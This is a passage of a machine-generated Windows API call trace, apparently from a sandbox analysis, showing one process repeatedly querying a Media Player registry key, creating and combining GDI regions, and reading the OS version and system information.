lpRect=0x18178c) returned 0 [0087.692] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.692] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.692] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x940401cd [0087.692] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x920401d0 [0087.692] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409ea [0087.692] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409eb [0087.692] CombineRgn (hrgnDst=0x10409ea, hrgnSrc1=0x940401cd, hrgnSrc2=0x920401d0, iMode=1) returned 1 [0087.692] CombineRgn (hrgnDst=0x10409eb, hrgnSrc1=0x940401cd, hrgnSrc2=0x920401d0, iMode=4) returned 2 [0087.692] CreateSolidBrush (color=0xff) returned 0x21009e9 [0087.692] CreateSolidBrush (color=0xff0000) returned 0x11009ec [0087.693] DeleteObject (ho=0x11009ec) returned 1 [0087.693] DeleteObject (ho=0x920401d0) returned 1 [0087.693] DeleteObject (ho=0x940401cd) returned 1 [0087.693] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.693] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.693] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.693] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.693] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.693] BeginPath (hdc=0x0) returned 0 [0087.693] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.693] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.693] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.693] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.693] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.693] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.693] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.693] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.693] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x930401d0 [0087.693] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x950401cd [0087.693] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409ed [0087.693] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409ee [0087.693] CombineRgn (hrgnDst=0x10409ed, hrgnSrc1=0x930401d0, hrgnSrc2=0x950401cd, iMode=1) returned 1 [0087.693] CombineRgn (hrgnDst=0x10409ee, hrgnSrc1=0x930401d0, hrgnSrc2=0x950401cd, iMode=4) returned 2 [0087.693] CreateSolidBrush (color=0xff) returned 0x21009ec [0087.693] CreateSolidBrush (color=0xff0000) returned 0x11009ef [0087.693] DeleteObject (ho=0x11009ef) returned 1 [0087.693] DeleteObject (ho=0x950401cd) returned 1 [0087.693] DeleteObject (ho=0x930401d0) returned 1 [0087.693] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.693] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.693] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.693] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.693] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.693] BeginPath (hdc=0x0) returned 0 [0087.693] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.693] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.693] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.693] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.693] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.693] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.693] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.694] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.694] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x960401cd [0087.694] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x940401d0 [0087.694] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409f0 [0087.694] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10409f1 [0087.694] CombineRgn (hrgnDst=0x10409f0, hrgnSrc1=0x960401cd, hrgnSrc2=0x940401d0, iMode=1) returned 1 [0087.694] CombineRgn (hrgnDst=0x10409f1, hrgnSrc1=0x960401cd, hrgnSrc2=0x940401d0, iMode=4) returned 2 [0087.694] CreateSolidBrush (color=0xff) returned 0x21009ef [0087.694] CreateSolidBrush (color=0xff0000) returned 0x11009f2 [0087.694] DeleteObject (ho=0x11009f2) returned 1 [0087.694] DeleteObject (ho=0x940401d0) returned 1 [0087.694] DeleteObject (ho=0x960401cd) returned 1 [0087.694] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.694] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.694] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.694] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.694] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.694] BeginPath (hdc=0x0) returned 0 [0087.694] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.694] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.694] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.694] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.694] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.694] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.694] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.694] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.727] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x950401d0 [0087.727] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x970401cd [0087.727] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a8c [0087.727] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a8d [0087.727] CombineRgn (hrgnDst=0x1040a8c, hrgnSrc1=0x950401d0, hrgnSrc2=0x970401cd, iMode=1) returned 1 [0087.727] CombineRgn (hrgnDst=0x1040a8d, hrgnSrc1=0x950401d0, hrgnSrc2=0x970401cd, iMode=4) returned 2 [0087.727] CreateSolidBrush (color=0xff) returned 0x21009f2 [0087.727] CreateSolidBrush (color=0xff0000) returned 0x1100a8e [0087.727] DeleteObject (ho=0x1100a8e) returned 1 [0087.727] DeleteObject (ho=0x970401cd) returned 1 [0087.727] DeleteObject (ho=0x950401d0) returned 1 [0087.727] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.727] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.727] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.727] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.727] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.727] BeginPath (hdc=0x0) returned 0 [0087.727] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.727] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.727] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.727] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.727] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.727] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.728] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.728] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.728] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x980401cd [0087.728] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x960401d0 [0087.728] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a8f [0087.728] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a90 [0087.728] CombineRgn (hrgnDst=0x1040a8f, hrgnSrc1=0x980401cd, hrgnSrc2=0x960401d0, iMode=1) returned 1 [0087.728] CombineRgn (hrgnDst=0x1040a90, hrgnSrc1=0x980401cd, hrgnSrc2=0x960401d0, iMode=4) returned 2 [0087.728] CreateSolidBrush (color=0xff) returned 0x2100a8e [0087.728] CreateSolidBrush (color=0xff0000) returned 0x1100a91 [0087.728] DeleteObject (ho=0x1100a91) returned 1 [0087.728] DeleteObject (ho=0x960401d0) returned 1 [0087.728] DeleteObject (ho=0x980401cd) returned 1 [0087.728] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.728] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.728] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.728] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.728] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.728] BeginPath (hdc=0x0) returned 0 [0087.728] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.728] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.728] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.728] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.728] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.728] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.728] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.728] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.728] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x970401d0 [0087.728] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x990401cd [0087.728] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a92 [0087.728] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a93 [0087.728] CombineRgn (hrgnDst=0x1040a92, hrgnSrc1=0x970401d0, hrgnSrc2=0x990401cd, iMode=1) returned 1 [0087.728] CombineRgn (hrgnDst=0x1040a93, hrgnSrc1=0x970401d0, hrgnSrc2=0x990401cd, iMode=4) returned 2 [0087.728] CreateSolidBrush (color=0xff) returned 0x2100a91 [0087.728] CreateSolidBrush (color=0xff0000) returned 0x1100a94 [0087.728] DeleteObject (ho=0x1100a94) returned 1 [0087.728] DeleteObject (ho=0x990401cd) returned 1 [0087.728] DeleteObject (ho=0x970401d0) returned 1 [0087.729] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.729] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.729] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.729] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.729] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.729] BeginPath (hdc=0x0) returned 0 [0087.729] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.729] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.729] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.729] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.729] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.729] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.729] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.729] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.729] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9a0401cd [0087.729] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x980401d0 [0087.729] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a95 [0087.729] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a96 [0087.729] CombineRgn (hrgnDst=0x1040a95, hrgnSrc1=0x9a0401cd, hrgnSrc2=0x980401d0, iMode=1) returned 1 [0087.729] CombineRgn (hrgnDst=0x1040a96, hrgnSrc1=0x9a0401cd, hrgnSrc2=0x980401d0, iMode=4) returned 2 [0087.729] CreateSolidBrush (color=0xff) returned 0x2100a94 [0087.729] CreateSolidBrush (color=0xff0000) returned 0x1100a97 [0087.729] DeleteObject (ho=0x1100a97) returned 1 [0087.729] DeleteObject (ho=0x980401d0) returned 1 [0087.729] DeleteObject (ho=0x9a0401cd) returned 1 [0087.729] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.729] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.729] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.729] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.729] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.729] BeginPath (hdc=0x0) returned 0 [0087.729] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.729] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.729] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.729] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.729] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.729] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.729] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.729] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.730] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x990401d0 [0087.730] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9b0401cd [0087.730] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a98 [0087.730] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a99 [0087.730] CombineRgn (hrgnDst=0x1040a98, hrgnSrc1=0x990401d0, hrgnSrc2=0x9b0401cd, iMode=1) returned 1 [0087.730] CombineRgn (hrgnDst=0x1040a99, hrgnSrc1=0x990401d0, hrgnSrc2=0x9b0401cd, iMode=4) returned 2 [0087.730] CreateSolidBrush (color=0xff) returned 0x2100a97 [0087.730] CreateSolidBrush (color=0xff0000) returned 0x1100a9a [0087.730] DeleteObject (ho=0x1100a9a) returned 1 [0087.730] DeleteObject (ho=0x9b0401cd) returned 1 [0087.730] DeleteObject (ho=0x990401d0) returned 1 [0087.730] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.730] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.730] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.730] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.730] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.730] BeginPath (hdc=0x0) returned 0 [0087.730] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.730] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.730] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.730] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.730] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.730] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.730] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.730] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.730] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9c0401cd [0087.730] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9a0401d0 [0087.730] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a9b [0087.730] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a9c [0087.730] CombineRgn (hrgnDst=0x1040a9b, hrgnSrc1=0x9c0401cd, hrgnSrc2=0x9a0401d0, iMode=1) returned 1 [0087.730] CombineRgn (hrgnDst=0x1040a9c, hrgnSrc1=0x9c0401cd, hrgnSrc2=0x9a0401d0, iMode=4) returned 2 [0087.730] CreateSolidBrush (color=0xff) returned 0x2100a9a [0087.730] CreateSolidBrush (color=0xff0000) returned 0x1100a9d [0087.730] DeleteObject (ho=0x1100a9d) returned 1 [0087.730] DeleteObject (ho=0x9a0401d0) returned 1 [0087.730] DeleteObject (ho=0x9c0401cd) returned 1 [0087.730] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.730] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.730] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.731] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.731] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.731] BeginPath (hdc=0x0) returned 0 [0087.731] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.731] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.731] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.731] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.731] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.731] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.731] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.731] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.731] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9b0401d0 [0087.731] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9d0401cd [0087.731] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a9e [0087.731] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a9f [0087.731] CombineRgn (hrgnDst=0x1040a9e, hrgnSrc1=0x9b0401d0, hrgnSrc2=0x9d0401cd, iMode=1) returned 1 [0087.731] CombineRgn (hrgnDst=0x1040a9f, hrgnSrc1=0x9b0401d0, hrgnSrc2=0x9d0401cd, iMode=4) returned 2 [0087.731] CreateSolidBrush (color=0xff) returned 0x2100a9d [0087.731] CreateSolidBrush (color=0xff0000) returned 0x1100aa0 